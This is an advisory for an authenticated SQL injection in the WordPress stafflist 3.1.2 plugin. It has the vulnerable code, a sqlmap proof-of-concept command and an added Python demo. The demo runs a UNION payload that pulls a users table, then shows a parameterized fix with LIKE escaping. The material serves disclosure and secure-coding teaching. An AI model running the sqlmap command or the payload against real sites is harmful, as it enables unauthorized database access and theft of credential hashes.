WordPress Plugin stafflist 3.1.2 SQLi (Authenticated)

2022.05.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
# Date: 05-02-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/stafflist/
# Version: 3.1.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com

# Vulnerable Code:

$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ? ...
$where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR LOWER(firstname) LIKE '%{$w}%' OR LOWER(department) LIKE '%{$w}%' OR LOWER(email) LIKE '%{$w}%'" : "");

# Vulnerable URL

http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]

# POC

```
sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*' --cookie="wordpress_cookies_paste_here"
```

# POC Image

https://prnt.sc/AECcFRHhe2ib
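The root cause in the snippet above is that the `search` GET parameter is trimmed and then concatenated straight into four `LIKE '%...%'` clauses, so any single quote in it ends the string literal and the rest becomes SQL. The `*` in the sqlmap URL marks that parameter as the injection point, and the `--cookie` option is needed because `wp-admin/admin.php?page=stafflist` is only reachable by a logged-in user who can see the plugin page, which is why the advisory rates this as authenticated. The following Python example is added here and is not code from the advisory or from the stafflist plugin: it rebuilds the same `$where` string against an in-memory SQLite table standing in for the MySQL staff table (constructed sample rows and a constructed `wp_users` table), shows a `UNION` payload pulling rows from the other table, and then shows the parameterized form. Lower-casing the search term before use is assumed from the `LOWER(...)` comparisons, since the page elides that part of the assignment. In WordPress the equivalent fix is to build the pattern with `$wpdb->esc_like()` and pass it to `$wpdb->prepare()` rather than interpolating it; `escape_like()` below mirrors what `esc_like()` does.

```python
"""Added example (not from the advisory or the stafflist plugin): the
advisory's string-built WHERE clause versus a parameterized one, run against
SQLite so it executes offline."""
import sqlite3

# Constructed sample data standing in for the plugin's staff table.
STAFF = [
    ("Smith", "Anna", "IT", "anna@example.test"),
    ("Jones", "Ben", "HR", "ben@example.test"),
    ("Lee", "Chloe", "Finance", "chloe@example.test"),
]


def make_db():
    """Build the staff table plus a second table the search box must never expose."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE staff (lastname TEXT, firstname TEXT, department TEXT, email TEXT)")
    conn.executemany("INSERT INTO staff VALUES (?, ?, ?, ?)", STAFF)
    conn.execute("CREATE TABLE wp_users (user_login TEXT, user_pass TEXT)")
    conn.execute("INSERT INTO wp_users VALUES ('admin', '$P$Bhashedvalue')")  # constructed hash
    return conn


def search_vulnerable(conn, search):
    """Mirrors the advisory's pattern: trim, lower-case (assumed), then interpolate
    the raw value into LIKE '%...%' clauses. A quote in `search` breaks out."""
    w = search.strip().lower()
    where = ""
    if w:
        where = (f"WHERE LOWER(lastname) LIKE '%{w}%' OR LOWER(firstname) LIKE '%{w}%' "
                 f"OR LOWER(department) LIKE '%{w}%' OR LOWER(email) LIKE '%{w}%'")
    sql = f"SELECT lastname, firstname, department, email FROM staff {where}"
    return conn.execute(sql).fetchall()


def escape_like(term):
    """LIKE-escape the way $wpdb->esc_like() does: make %, _ and \\ literal so a
    user-supplied wildcard cannot widen the match."""
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_safe(conn, search):
    """Same query, but the pattern travels as a bound parameter. The SQL text is
    fixed, so no value of `search` can change its structure."""
    w = search.strip().lower()
    base = "SELECT lastname, firstname, department, email FROM staff"
    if not w:
        return conn.execute(base).fetchall()
    pattern = f"%{escape_like(w)}%"
    sql = (base + " WHERE LOWER(lastname) LIKE ? ESCAPE '\\' OR LOWER(firstname) LIKE ? ESCAPE '\\'"
           " OR LOWER(department) LIKE ? ESCAPE '\\' OR LOWER(email) LIKE ? ESCAPE '\\'")
    return conn.execute(sql, (pattern,) * 4).fetchall()


# Closes the LIKE literal, appends a UNION over the other table and comments out the
# remaining clauses. "-- -" is used instead of "-- " because trim() strips the trailing
# space MySQL would need after "--".
PAYLOAD = "%' UNION SELECT user_login, user_pass, 1, 1 FROM wp_users -- -"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", search_vulnerable(db, PAYLOAD))  # staff rows plus the admin row
    print("safe:      ", search_safe(db, PAYLOAD))        # no rows match the literal text
    print("wildcard:  ", search_vulnerable(db, "%"), search_safe(db, "%"))
```

The wildcard case at the end is the secondary point: even with a bound parameter, an unescaped `%` or `_` lets a user enumerate the whole table through the search box, which is what `esc_like()` (here `escape_like()`) prevents.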

